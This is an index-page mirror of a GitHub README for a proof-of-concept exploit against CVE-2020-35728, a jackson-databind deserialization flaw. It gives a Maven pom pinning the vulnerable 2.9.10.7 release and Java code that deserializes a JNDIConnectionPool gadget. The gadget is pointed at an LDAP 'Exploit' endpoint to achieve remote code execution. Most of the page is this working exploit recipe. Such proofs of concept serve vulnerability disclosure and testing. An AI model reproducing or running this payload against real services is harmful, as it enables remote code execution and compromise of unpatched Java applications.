Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/Al1ex/CVE-2020-35728

CVE-2020-35728 & Jackson-databind RCE
https://github.com/Al1ex/CVE-2020-35728

cve-2020-35728 jackson-databind rce

Last synced: 21 days ago
JSON representation

CVE-2020-35728 & Jackson-databind RCE

Awesome Lists containing this project

README

        

### Description
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl).

### How to RCE
pom.xml
```

4.0.0

com.jacksonTest
jacksonTest
1.0-SNAPSHOT


com.fasterxml.jackson.core
jackson-databind
2.9.10.7



org.glassfish.web
jakarta.servlet.jsp.jstl
2.0.0


org.slf4j
slf4j-nop
1.7.2



javax.transaction
jta
1.1

```
poc.java
~~~
import com.fasterxml.jackson.databind.ObjectMapper;

public class POC {
public static void main(String[] args) throws Exception {
String payload = "[\"com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1088/Exploit\"}]";
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
Object obj = mapper.readValue(payload, Object.class);
mapper.writeValueAsString(obj);
}
}
~~~
result

![result](image/result.jpg)